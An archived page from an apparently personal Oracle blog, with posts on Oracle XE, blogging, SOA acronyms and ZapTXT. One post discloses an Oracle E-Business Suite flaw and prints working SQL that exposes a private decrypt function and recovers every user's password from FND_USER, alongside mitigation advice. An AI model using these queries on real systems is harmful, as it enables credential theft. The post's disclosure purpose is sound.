Bye Bye 2006, Welcome 2007
As we say bye bye to 2006, I would like to thank you, my dear reader, for reading my blog and spending part of your time leaving comments and feedback.
For me, the highlights of 2006 were:
- The birth of my baby Julie
- The blogger of the year award
- The visit to Oracle OpenWorld in San Francisco
I would also like to share with you some statistics from the past 12 months (as per Google Analytics and Feedburner):
Top 10 pages
The following pages received the most hits during 2006:
- Home page
- Format your SQL the easy way
- Oracle SQLPlus
- Saving/Downloading files to/from Oracle using ColdFusion
- Cool SQL function: EXTRACT
- Back to basics: outer joins
- NVL, NVL2 or COALESCE?
- HTTP POST from inside Oracle
- PRAGMAtism in Oracle PL/SQL
- Oracle Trace Analyzer is TKPROF on Steroids
Top 10 browsers
Internet Explorer was the most popular followed by Firefox:
Top 10 countries
Almost half of the traffic originated from the US and the UK:
Top referrers
Google was responsible for more than 65% of the traffic, and 10% of the visits were direct, i.e. from bookmarks or directly typing the blog URL:
The number of subscribers to the blog feed has been steadily growing:
In 2007 I will continue to blog about whatever I find interesting and useful to both you and me.
Here on the west coast of the United States, we celebrate new year later than the rest of the world. At the time of this writing, there is almost 12 hours till we welcome the arrival of 2007.
My next post will be next year 
Happy New Year!
Filed in ColdFusion, Google, Oracle, WordPress with Comments Off | Tags: blog, new-yearHow to Give Your System a Break from Oracle XE
There was a question on OraQA about how to stop Oracle XE from starting up with your computer. When you install Oracle XE on Windows, it creates a service called “OracleServiceXE” with a startup type of “Automatic” which means that the service starts automatically when the computer boots.
One way to prevent Oracle XE from starting up automatically is to change the startup type of the Oracle service to “Manual”. You can do that by navigating to your Control Panel -> Administrative Tools -> Services, double click on the Oracle service and change the Startup type to Manual.
Another way to prevent Oracle XE from starting up automatically when Windows starts is to use the ORADIM command-line tool that is available with the Oracle database. From the DOS command line execute the following:
oradim -edit -sid XE -startmode manual
Now, when you want to use Oracle XE, you start it up like this:
oradim -startup -sid XE
And you shut it down like this:
oradim -shutdown -sid XE
Or you can use the “Start Database” and “Stop Database” shortcuts installed with Oracle XE. Navigate to Start -> All Programs -> Oracle Database 10g Express Edition ->
Now you know how you can squeeze out a bit of extra performance from your computer when you are not using Oracle XE
Sources and Resources:
Filed in Oracle, Tips with 1 Comment | Tags: xeWhat You Should Not Blog About
Here is an interesting post about things you should avoid blogging about. I could not agree more with the following:
…There’s no real point to those “I can’t blog ’cause I’m too busy†posts other than giving a cop-out for not keeping up with your blog. People come to your blog to read your content, not your excuses for not producing your content…
What also puzzles me is why some bloggers apologize for not blogging as frequently as they think they should or as frequently as they used to. They usually start their posts with: “I’m sorry for not blogging recently. I have been busy doing bla bla bla”. I do not see the need for an apology here, do you?
So, I’m not going to apologize for not blogging as frequently as I used to recently, I just felt that I wanted to take a short break.
I also have my parents visiting from Lebanon. My mom is a great cook, I have been enjoying her delicious Lebanese dishes everyday, and gaining more weight everyday 
. Moreover, my soon-to-be three month old baby Julie is keeping us really busy. Oops! did I say busy?!
Finally, I would like to wish you all a very Merry Christmas and happy holidays.
Filed in Interesting Stuff, Personal with 9 Comments | Tags: xmasOracle E-Business Suite Vulnerability: Users Passwords Decrypted
Johan Louwers published an Oracle Applications passwords decryption vulnerability that allows a malicious user to expose the passwords of any Oracle Applications user. In Oracle E-Business Suite, usernames and their encrypted passwords are stored in the table fnd_user:
SQL> desc fnd_user;
Name Null? Type
----------------------------------------- -------- ----------------
USER_ID NOT NULL NUMBER(15)
USER_NAME NOT NULL VARCHAR2(100)
LAST_UPDATE_DATE NOT NULL DATE
LAST_UPDATED_BY NOT NULL NUMBER(15)
CREATION_DATE NOT NULL DATE
CREATED_BY NOT NULL NUMBER(15)
LAST_UPDATE_LOGIN NUMBER(15)
ENCRYPTED_FOUNDATION_PASSWORD NOT NULL VARCHAR2(100)
ENCRYPTED_USER_PASSWORD NOT NULL VARCHAR2(100)
...
The column ENCRYPTED_USER_PASSWORD stores the encrypted value of the user’s password. The column ENCRYPTED_FOUNDATION_PASSWORD stores the encrypted value of the guest user.
To decrypt the ENCRYPTED_USER_PASSWORD you need access to the DECRYPT function in the APPS.FND_WEB_SEC package. Since DECRYPT is a private function, you need to add the declaration of this function to the package specification so that you can use it outside the package.
FUNCTION decrypt(key IN VARCHAR2, value IN VARCHAR2)
RETURN VARCHAR2;
The key is the decrypted ENCRYPTED_FOUNDATION_PASSWORD. The value is the ENCRYPTED_USER_PASSWORD.
So, the first step in the decryption of a user’s password is to decrypt the ENCRYPTED_FOUNDATION_PASSWORD. This can be accomplished by executing the following query:
WITH guest AS
(
SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD')) user_pwd,
UPPER (SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
1,
INSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
'/'
)
- 1
)
) user_name
FROM DUAL)
SELECT fnd_web_sec.decrypt (guest.user_pwd,
fnd_user.encrypted_foundation_password
) apps_password
FROM fnd_user,
guest
WHERE fnd_user.user_name = guest.user_name
Now, using the above query, we can now decrypt all the values in the FND_USER.ENCRYPTED_USER_PASSWORD column:
WITH guest AS
(
SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD')) user_pwd,
UPPER (SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
1,
INSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
'/'
)
- 1
)
) user_name
FROM DUAL)
SELECT fnd_user.user_name,
fnd_web_sec.decrypt
((SELECT fnd_web_sec.decrypt
(guest.user_pwd,
fnd_user.encrypted_foundation_password
) apps_password
FROM fnd_user,
guest
WHERE fnd_user.user_name = guest.user_name),
fnd_user.encrypted_user_password
) decrypted_user_password
FROM fnd_user
ORDER BY fnd_user.user_name
VOILA!
Of course, in order for the above queries to work, you have to have the privilege to modify and compile the package APPS.FND_WEB_SEC. Assuming that you do have this privilege on a development instance and assuming that passwords are not reset when a development instance is refreshed from a production instance, this can represent a serious security risk.
Updated a few hours later: Stephen Kost just blogged about this subject. He writes that since the decryption routine is a Java class, it is actually easy to create a Java application that calls the decrypt method. So, no need to even have access to a database to run the decrypt. Moreover, he does not expect Oracle to fix this password weakness in the foreseeable future. He also offers a few recommendations to improve the security of the user passwords, like making sure that APPLSYSPUB does not have SELECT privileges on APPS.FND_USER_VIEW, changing the passwords for all Oracle Applications 11i seeded accounts, creating all new user accounts with strong and unique passwords and limiting access to the APPLSYS.FND_USER and APPLSYS.FND_ORACLE_USERID tables by all non-DBA accounts.
Updated January 9 2007: Oracle Applications Password Decryption (PDF)
Filed in Oracle, Security with 18 Comments | Tags: E-Business-Suite, hackHow to Ask for Help the Right Way
Yesterday, I received the following email:
Hi, We’d bought oracle 10g with RH Enterprise Linux in 2005. After year of a smooth
operation we’re having following problems with Oracle 10g.
– system shutdowns once a day automatically
– listener could not find available handler for requested type of server .
Listener failed to start. But registered with the listener and that the
appropriate handlers are accepting connections.
We can’t figure it out why the server is suddenly shutdowns. Can you provide us
solution solving this problem.
Looking forward hearing from you,
Regards,
Now, how am I supposed to reply? I’m almost tempted to send him here, but this is not a “read the manual” issue, it is much worse than that. This is one example of how you ask for help the wrong way.
So, how to ask for help the right or the smart way. Well, provide details. Details like the type and version number for your database and operating system, error messages, test scenarios, test data, test scripts. Am I missing something?
In short, the more specific you are in describing your problem the better chance someone will respond with a solution.
I guess I will reply with the following two links:
- How To Ask Questions The Smart Way by Eric S. Raymond and Rick Moen.
- How To Ask Questions by Tom Kyte.
When Pictures Go Wild
I’m having too much fun with PikiPimp this Sunday evening
links for 2006-12-08
-
Should it be allowed to have NULL values in a database?
-
This article shows you how to use the Oracle Data Dictionary to obtain: table definitions, constraints, Indexes, views, sequences, triggers and PL/SQL functions and procedure.
-
Is there a way to check to see if a system file exists in PL/SQL?
-
Oracle defines a number of exceptions for me, like no_data_found. Why would I ever need to or want to define my own exceptions?
Top 50 SOA-Related Acronyms
During the next few months I will be involved in migrating our current E-Commerce system to a new architecture, namely service-oriented architecture, or SOA for short. So, in order to learn SOA and its components, I downloaded and installed Oracle JDeveloper and the Oracle SOA suite on my personal computer.
I installed the SOADEMO schema and its objects on my Oracle XE database and went through the Oracle SOA Suite tutorial from start to finish. I have found the tutorial to be very useful and essential to getting started with SOA and especially BPEL and ESB (how do you pronounce BPEL?).
Notice that in the short paragraph above, I used three acronyms: SOA, BPEL and ESB. Well, if you want to dive into SOA, you will be swimming in a sea of acronyms. So, in order to keep my head straight, and hopefully yours too, the following is a list of acronyms I encountered while going through the tutorial (sorted alphabetically):
Acronym |
Meaning |
Description |
| ADF | Application Development Framework | An end-to-end J2EE framework that simplifies development by providing out of the box infrastructure services and a visual and declarative development experience. |
| ANT | Another Neat Tool | A software tool for automating software build processes. It is written in the Java language, requires the Java platform, and is best suited to building Java projects. |
| API | Application Programming Interface | The interface that a computer system, library or application provides in order to allow requests for services to be made of it by other computer programs, and/or to allow data to be exchanged between them. |
| B2B | Business-to-Business | Referes to automated processes between trading partners. |
| BAM | Business Activity Monitoring | Solution for building interactive, real-time dashboards and proactive alerts for monitoring business processes and services. |
| BPA | Business Process Analysis | Solution to perform process modeling & analysis, simulation and publishing of process models. |
| BPEL | Business Process Execution Language | Enables enterprises to orchestrate disparate applications and Web services into business processes. |
| DIME | Direct Internet Message Encapsulation | A Microsoft-proposed internet standard for the transfer of binary and other encapsulated data over SOAP. |
| EAI | Enterprise Application Integration | The uses of software and computer systems architectural principles to integrate a set of enterprise computer applications. |
| EAR | Enterprise Application aRchive | A way of creating a portable collection of logically related Java 2 Platform, Enterprise Edition (J2EE) components. |
| EDA | Event-Driven Architecture | Provides the capabilities to easily create, process, analyze, and manage events with limited coding. |
| EDI | Electronic Data Interchange | The computer-to-computer exchange of structured information, by agreed message standards, from one computer application to another by electronic means and with a minimum of human intervention. |
| EIS | Enterprise Information System | Any kind of computing system that is of "enterprise class". This means typically offering high quality of service, dealing with large volumes of data – capable of supporting some large organization. |
| EJB | Enterprise Java Bean | the server-side component architecture for Java Platform, Enterprise Edition (Java EE). EJB technology enables rapid and simplified development of distributed, transactional, secure and portable applications based on Java technology. |
| ESB | Enterprise Service Bus | Moves data among multiple endpoints. It uses open standards to connect, transform, and route business documents (as Extensible Markup Language (XML) messages), among disparate applications. |
| J2EE | Java 2 platform, Enterprise Edition | A set of coordinated specifications and practices that together enable solutions for developing, deploying, and managing multi-tier server-centric applications. |
| JAAS | Java Authentication and Authorization Service | An API that enables Java applications to access authentication and access control services without being tied to those services. |
| JAR | Java ARchive | A collection of class files packaged with the ZIP file format. |
| JAXB | Java Architecture for Xml Binding | Provides a convenient way to bind an XML schema to a representation in Java code. This makes it easy for you to incorporate XML data and processing functions in applications based on Java technology without having to know much about XML itself. |
| JAX-RPC | Java Api for Xml-based RPC | Used to build Web applications and Web services, incorporating XML-based RPC functionality according to the SOAP 1.1 specification. |
| JCA | Java Connector Architecture | Provides a Java technology solution to the problem of connectivity between the many application servers and today’s enterprise information systems (EIS) |
| JDBC | Java DataBase Connectivity | An API for the Java programming language that defines how a client may access a database. |
| JMS | Java Message Service | A messaging standard that allows application components based on the Java 2 Platform, Enterprise Edition (J2EE) to create, send, receive, and read messages. |
| JNDI | Java Naming and Directory Interface | A part of the Java platform, providing applications based on Java technology with a unified interface to multiple naming and directory services. |
| JSF | JavaServer Faces | A technology that simplifies building user interfaces for JavaServer applications. |
| JSP | JavaServer Pages | A Java technology that allows software developers to dynamically generate HTML, XML or other types of documents in response to a Web client request. |
| JSR | Java Specification Request | Formal documents that describe proposed specifications and technologies to be added to the Java platform. |
| JTA | Java Transaction Api | Standard Java interfaces between a transaction manager and the parties involved in a distributed transaction system: the resource manager, the application server, and the transactional applications. |
| LDAP | Lightweight Directory Access Protocol | A networking protocol for querying and modifying directory services running over TCP/IP. |
| MIME | Multipurpose Internet Mail Extensions | A set of extensions to the Internet Mail standards that supports the inclusion of multi-part and multimedia files, such as sound and video, in e-mail messages. |
| MVC | Model-View-Controller | A design pattern that decouples data access and business logic from data presentation and user interaction, and introduces an intermediate component: the Controller. |
| OC4J | Oracle Containers for J2EE | the core J2EE runtime component of Oracle Application Server. |
| OEMS | Oracle Enterprise Messaging Service | A standards based solution built on the Java Message Service (JMS) and the J2EE Connector Architecture (JCA) which allows customers to develop and integrate distributed applications. |
| OID | Oracle Internet Directory | An LDAP v3 directory that leverages the scalability, high availability and security features of the Oracle Database. |
| OPMN | Oracle Process Manager and Notification | OPMN is installed and configured with every Oracle Application Server installation type and is essential for running Oracle Application Server. OPMN enables you manage your Oracle Application Server instance in an hierarchical fashion as part of a cluster topology. |
| OWSM | Oracle Web Services Manager | Oracle Web Services Manager is a comprehensive solution for adding policy-driven best practices to all your existing or new Web services and provides the key security and management capabilities necessary to deploy Service-Oriented Architectures across your line-of-business applications. |
| POJO | Plain Old Java Object | The name is used to emphasize that the object in question is not somehow special but an ordinary Java Object, in particular not an EJB |
| REST | REpresentational State Transfer | An XML-based protocol for invoking Web services over HTTP. REST is a lighter version of SOAP. |
| RMI | Remote Method Invocation | Provides for remote communication between programs written in the Java programming language. |
| SOA | Service-Oriented Architecture | An arcitecture that facilitates the development of modular business services that can be easily integrated and reused. |
| SOAP | Simple Object Access Protocol | A protocol for exchanging XML-based messages over computer network, normally using HTTP. |
| UDDI | Universal Description Discovery and Integration | A Web-based distributed directory that enables businesses to list themselves on the Internet and discover each other, similar to a traditional phone book’s yellow and white pages. |
| WAR | Web ARchive | A ZIP file used to distribute a set of Java classes |
| WSDL | Web Services Description Language | An XML-based language for defining Web services. |
| WSIF | Web Services Invocation Framework | A simple Java API for invoking Web services, no matter how or where the services are provided. |
| WSM | Web Services Manager | A comprehensive solution for adding policy-driven best practices to all your existing or new Web services and provides the key security and management capabilities necessary to deploy Service-Oriented Architectures across your line-of-business applications. |
| XML | eXtensible Markup Language | A meta-language that allows you to completely describe a class of other languages, which in turn describe documents. |
| XSD | Xml Schema Definition | An XML document that describes the structure of another XML document. |
| XSL | eXtensible Stylesheet Language | A family of transformation languages which allows one to describe how files encoded in the XML standard are to be formatted or transformed. |
| XSLT | eXtensible Stylesheet Language Transformation | Software that converts an XML document into another format such as HTML, PDF or text. It may also be used to convert one XML document to another XML document with a different set of XML tags |
You Don’t Have to Use an Aggregator to Keep Track of Your Favorite Topic
With the increase in the number of blogs aggregated by OraNA, the idea of categorizing blogs into smaller groups, each with its own theme and its own feed may be a good idea (for me, I still want to keep track of everything).
For example, there are aggregators that aggregate blogs about JDeveloper and others that aggregate blogs about Oracle E-Business Suite. But, is this the best way to keep track of your favorite topic? Well, the keyword here is topic. Aggregators aggregate blogs not topics. A blogger who writes about Java and has a Java related blog for example, may also write about other topics that have nothing to do with Java.
So, is there a better way to keep track of your favorite (Oracle specific) topics? The answer is yes. You use the OraNA feed and ZapTXT.
ZapTXT is a free service that lets you keep track of RSS enabled web sites in real time. Just tell ZapTXT what topic (by keywords) you’re interested in and which feed(s) you’d like to monitor, and ZapTXT will notify you by email, instant messenger or mobile device whenever your keywords appear in the feed(s). You will even get a unique RSS feed for your notifications.
Once you have created an account with ZapTXT, you are all set to create “ZapTasks”. A ZapTask is a set of keywords you enter to monitor a given RSS or Atom feed that you specify. You can add your own feed, select one from a list of tags or create an OPML file to monitor keyword(s) across multiple feeds. You can specify multiple keywords separated by boolean operators like AND and OR. You can also enter a phrase in the keywords field and enclose it in quotation marks to perform an exact match.
Once you have created a ZapTask,
- You can view all of your alerts online.
- You can modify your delivery preferences or deactivate your alerts at any time.
- You can install ZapTXT Mobile Widget to access your ZapTXT data from your mobile phone.
For example, you can create a ZapTask to monitor the OraNA feed for any occurrence of “jdeveloper OR jdev OR adf”. As soon as your keyword appears in the feed you get a notification.
And here is an example of an e-mail notification:
ZapTask: name of your search
Title: Title of the blog where your keyword was foundA snippet of the blog post where your keyword was found
Link to full posting: URL
To see past alert results go to: http://zaptxt.com/myzaptasks/
ZapTXT is a very useful service that helps you stay up to date and focused on your favorite topics.
Filed in Interesting Stuff, Oracle, Technology, Tips with 3 Comments | Tags: aggregator, blog
